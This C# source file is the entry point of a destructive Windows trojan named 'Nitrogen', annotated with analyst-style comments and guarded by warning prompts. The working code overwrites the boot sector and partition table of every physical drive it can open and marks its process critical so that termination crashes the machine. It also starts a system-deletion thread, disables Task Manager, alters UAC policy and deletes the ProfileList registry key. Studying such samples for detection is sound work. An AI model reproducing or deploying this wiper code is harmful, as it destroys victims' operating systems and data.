Nitrogen/Program.cs


using Microsoft.Win32;
using System;
using System.Diagnostics;
using System.Threading;
using System.Windows.Forms;
using static Nitrogen.Dll_Imports;
namespace Nitrogen
{
internal static class Program
{
/// <summary>
/// Application entry point. Initialises WinForms, then passes through three gates
/// before handing control to <see cref="Run"/>: a single-instance check, an
/// environment check, and two explicit Yes/No confirmations (both default to "No").
/// Every declined or failed gate ends the process with exit code 0.
/// </summary>
/// <remarks>
/// NOTE(review): <c>variables.AlreadyRunning</c> and <c>variables.IsAnalyzed</c> are
/// defined outside this file. Judging by the error text, <c>IsAnalyzed</c> presumably
/// reports whether an isolated/analysis environment was detected — confirm against its
/// implementation. For analysts: this gate is the sample's own self-check, not a
/// safety control; handle the binary only in a disposable, snapshotted VM.
/// </remarks>
[STAThread]
static void Main()
{
    Application.EnableVisualStyles();
    Application.SetCompatibleTextRenderingDefault(false);

    // Gate 1: a second instance quits silently.
    if (variables.AlreadyRunning())
    {
        Environment.Exit(0);
    }

    // Gate 2: refuse to continue when the environment check fails.
    if (!variables.IsAnalyzed())
    {
        MessageBox.Show("For your security, this malware can only run in isolated environments.","Nitrogen - ENVIRONMENT ERROR",MessageBoxButtons.OK,MessageBoxIcon.Error);
        Environment.Exit(0);
    }

    // Gate 3: first confirmation; Button2 ("No") is the default button.
    DialogResult firstAnswer = MessageBox.Show("You have run a trojan known as Nitrogen.\nRunning the malware will result in data loss and your machine being unusable.\n\nDO YOU WANT TO RUN THE MALWARE AND DESTROY YOUR COMPUTER?","Nitrogen - MALWARE WARNING",MessageBoxButtons.YesNo,MessageBoxIcon.Warning,MessageBoxDefaultButton.Button2);
    if (firstAnswer != DialogResult.Yes)
    {
        Environment.Exit(0);
    }

    // Gate 4: second and final confirmation, again defaulting to "No".
    DialogResult finalAnswer = MessageBox.Show("THIS IS THE FINAL WARNING!!\nRUNNING THIS MALWARE WILL REALLY WIPE YOUR OPERATING SYSTEM!!!!\n\nDO YOU STILL WANT TO RUN IT AND SAY GOODBYE TO YOUR OS??","Nitrogen - LAST MALWARE WARNING",MessageBoxButtons.YesNo,MessageBoxIcon.Error,MessageBoxDefaultButton.Button2);
    if (finalAnswer != DialogResult.Yes)
    {
        Environment.Exit(0);
    }

    // Only reached after both prompts were answered "Yes".
    Run();
}
/// <summary>
/// Destructive stage, called from Main only after both confirmation prompts were
/// answered "Yes". In order it: (1) writes a 512-byte boot sector image to every
/// physical drive it can open, (2) flags its own process as critical, (3) starts the
/// <c>payloads.del_sys</c> thread, (4) changes Task Manager / UAC policy values and
/// deletes the ProfileList registry subtree, (5) starts the <c>payloads.story</c> thread.
/// </summary>
/// <remarks>
/// Analyst notes (behaviours visible in this method, useful as detection points):
/// raw handle opens on <c>\\.\PhysicalDriveN</c> from a user-mode GUI process;
/// <c>NtSetInformationProcess</c> with information class 0x1D; writes to
/// <c>DisableTaskMgr</c>, <c>ConsentPromptBehaviorAdmin</c> and
/// <c>ConsentPromptBehaviorUser</c>; deletion of
/// <c>HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList</c>.
/// The raw-disk and HKLM operations normally require an elevated process.
/// <c>CreateFile</c>, <c>WriteFile</c>, <c>NtSetInformationProcess</c> and the constants
/// <c>GenericAll</c>, <c>FileShareRead</c>, <c>FileShareWrite</c>, <c>OpenExisting</c>
/// and <c>MbrSize</c> are not declared here; they presumably come from
/// <c>Nitrogen.Dll_Imports</c> via the file's <c>using static</c> — confirm there.
/// </remarks>
private static void Run()
{
// MBR Made by mattia2010.exeyt on Discord
// 32 rows x 16 bytes = 512 bytes, i.e. one legacy disk sector. The first ~110 bytes
// are 16-bit boot code, the rest is zero padding, and the final two bytes
// (0x55, 0xAA) are the boot-sector signature. Because the partition-table area is
// part of the zero padding, a drive overwritten with this image loses its MBR
// partition table as well as its boot code.
var mbrData = new byte[] {
0xE8, 0x03, 0x00, 0xE8, 0x1D, 0x00, 0xB4, 0x00, 0xB0, 0x13, 0xCD, 0x10, 0x68, 0x00, 0xA0, 0x07,
0xB4, 0x0C, 0x30, 0xC0, 0x31, 0xDB, 0x31, 0xC9, 0x31, 0xD2, 0xC3, 0x31, 0xC9, 0x31, 0xD2, 0xFF,
0x06, 0x6C, 0x7C, 0x81, 0xFA, 0x18, 0x01, 0x73, 0xF2, 0xE8, 0x10, 0x00, 0xE8, 0x2D, 0x00, 0x41,
0x81, 0xF9, 0x84, 0x03, 0x72, 0xED, 0x31, 0xC9, 0x42, 0xEB, 0xE8, 0xC3, 0x89, 0xCB, 0x31, 0xD3,
0x88, 0xD8, 0x02, 0x06, 0x6C, 0x7C, 0xC0, 0xE8, 0x02, 0xEB, 0x00, 0x3C, 0x37, 0x77, 0x05, 0x3C,
0x20, 0x72, 0x05, 0xC3, 0x2C, 0x10, 0xEB, 0xF3, 0x04, 0x20, 0xEB, 0xEF, 0x89, 0xD7, 0xC1, 0xE7,
0x06, 0x01, 0xD7, 0xC1, 0xE7, 0x02, 0x01, 0xCF, 0x26, 0x88, 0x05, 0xC3, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x55, 0xAA
};
// Stage 1 - boot sector overwrite. Iterates device indices 0..299 and writes the
// image at offset 0 of each \\.\PhysicalDrive<i>. The call results are not inspected,
// and the empty catch below swallows any exception raised inside the loop.
// Impact for responders: affected disks need their boot sector and partition table
// restored from backup or rebuilt; data past the first sector is not touched by
// this loop itself.
try
{
for (int i = 0; i < 300; i++)
{
var mbr = CreateFile($"\\\\.\\PhysicalDrive{i}", GenericAll, FileShareRead | FileShareWrite, IntPtr.Zero,
OpenExisting, 0, IntPtr.Zero);
WriteFile(mbr, mbrData, MbrSize, out uint lpNumberOfBytesWritten, IntPtr.Zero);
}
}
catch { }
// Stage 2 - critical-process flag. 0x1D is the ProcessBreakOnTermination information
// class; setting it to 1 makes Windows bug-check (blue screen) if this process is
// terminated. Process.EnterDebugMode() enables SeDebugPrivilege first, which the
// call needs. Practical consequence: killing the process during triage crashes the
// machine, so capture memory/state before attempting termination.
int isCritical = 1;
int BreakOnTermination = 0x1D;
Process.EnterDebugMode();
NtSetInformationProcess(Process.GetCurrentProcess().Handle, BreakOnTermination, ref isCritical, sizeof(int));
// Stage 3 - background thread running payloads.del_sys (defined elsewhere; the name
// suggests system-file deletion - TODO confirm against payloads).
Thread thr;
thr = new Thread(payloads.del_sys);
thr.Start();
// Stage 4 - registry tampering.
// HKCU ...\Policies\System\DisableTaskMgr = 1: Task Manager is disabled for the
// current user.
RegistryKey rk;
rk = Registry.CurrentUser.CreateSubKey(@"SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System");
rk.SetValue("DisableTaskMgr", 1, RegistryValueKind.DWord);
rk.Close();
// HKLM UAC policy: ConsentPromptBehaviorAdmin = 0 means administrators are elevated
// without any prompt; ConsentPromptBehaviorUser = 3 means standard users are asked
// for credentials.
rk = Registry.LocalMachine.CreateSubKey(@"SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System");
rk.SetValue("ConsentPromptBehaviorAdmin", 0, RegistryValueKind.DWord);
rk.SetValue("ConsentPromptBehaviorUser", 3, RegistryValueKind.DWord);
rk.Close();
// Removes the whole ProfileList subtree, the registry record that maps account SIDs
// to their user profiles; existing profiles can no longer be resolved at logon.
rk = Registry.LocalMachine.CreateSubKey(@"SOFTWARE\Microsoft\Windows NT\CurrentVersion");
rk.DeleteSubKeyTree("ProfileList");
rk.Close();
// Stage 5 - background thread running payloads.story (defined elsewhere; purpose not
// visible from this file).
thr = new Thread(payloads.story);
thr.Start();
}
/// <summary>
/// Never-returning scheduler loop. Each pass sleeps for a random 2000-4999 ms, draws
/// a number in the range 0-7 and inverts the matching boolean switch on
/// <c>variables</c>.
/// </summary>
/// <remarks>
/// NOTE(review): the switches are presumably polled by payload code elsewhere in the
/// project; nothing in this method performs an effect itself. A toggle for
/// <c>variables.drawcursor</c> was commented out in case 1 of the original and is
/// therefore not performed here either.
/// </remarks>
public static void random_payloads()
{
    while (true)
    {
        // Two separate Random instances per pass, exactly as in the original.
        Random pauseSource = new Random();
        Thread.Sleep(pauseSource.Next(2000, 5000));
        Random pickSource = new Random();
        int choice = pickSource.Next(0, 8);

        // "!(flag == true)" mirrors the original if/else: true becomes false,
        // anything else becomes true.
        switch (choice)
        {
            case 0:
                variables.sounds = !(variables.sounds == true);
                break;
            case 1:
                variables.iconmove = !(variables.iconmove == true);
                break;
            case 2:
                variables.extreme = !(variables.extreme == true);
                break;
            case 3:
                variables.gdi_payloads = !(variables.gdi_payloads == true);
                break;
            case 4:
                variables.keyboard = !(variables.keyboard == true);
                break;
            case 5:
                variables.mouse = !(variables.mouse == true);
                break;
            case 6:
                variables.textchanger = !(variables.textchanger == true);
                break;
            case 7:
                variables.window_shake = !(variables.window_shake == true);
                break;
        }
    }
}
}
}